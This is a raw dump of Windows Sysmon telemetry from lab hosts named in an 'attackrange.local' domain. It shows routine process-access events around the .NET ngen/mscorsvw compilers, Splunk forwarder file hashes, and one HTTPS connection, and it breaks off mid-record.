14:57:36.374{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE0-607E-FF0C-00000000BB01}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000075108Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.311{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE0-607E-FE0C-00000000BB01}6620C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075107Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.295{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBE0-607E-FE0C-00000000BB01}6620C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075106Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.295{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE0-607E-FE0C-00000000BB01}6620C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 354300x800000000000000075105Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:33.739{A7A01FEF-EBDC-607E-DA0C-00000000BB01}6440C:\Program Files\Microsoft Office\root\Integration\Integrator.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57539-false52.114.77.33-443https 10341000x800000000000000075104Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.233{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE0-607E-FD0C-00000000BB01}5536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075103Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.217{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBE0-607E-FD0C-00000000BB01}5536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075102Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.217{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE0-607E-FD0C-00000000BB01}5536C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000075101Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.186{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE0-607E-FC0C-00000000BB01}4968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075100Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.170{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBE0-607E-FC0C-00000000BB01}4968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075099Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.170{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE0-607E-FC0C-00000000BB01}4968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000075098Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.155{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9A7E2647E34601983ADFCE6D1C1710CF,SHA256=413CCF73618A97D1024369B3F4425B9411FCA7476B34F90F62DF2E0E36A20E65,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000075097Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.124{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE0-607E-FB0C-00000000BB01}4640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075096Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.108{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBE0-607E-FB0C-00000000BB01}4640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075095Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.108{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE0-607E-FB0C-00000000BB01}4640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000075094Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.061{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE0-607E-FA0C-00000000BB01}5444C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075093Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.045{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBE0-607E-FA0C-00000000BB01}5444C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075092Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:36.045{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE0-607E-FA0C-00000000BB01}5444C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000050292Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:36.380{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B09A20CE9D8AA5C85E944902725E5AC3,SHA256=49B10252F00D818507E145F953D3A43646722E239E8C5B0D1CF47C217AB8915C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000075155Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:37.639{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE1-607E-0C0D-00000000BB01}6852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075154Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:37.624{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBE1-607E-0C0D-00000000BB01}6852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075153Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:37.624{A7A01FEF-EBDA-607E-C60C-00000000BB01}35121112C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE1-607E-0C0D-00000000BB01}6852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000075152Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:37.624{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A0EAB826D3DF268577E60EA975D27047,SHA256=7B20A1B6A7926E427B4465EC08EEFD810382595B86E173A1B99F444DC7C0E125,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000075151Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:37.561{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-EBE1-607E-0B0D-00000000BB01}5804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000075150Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:37.545{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBE1-607E-0B0D-00000000BB01}5804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000075149Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 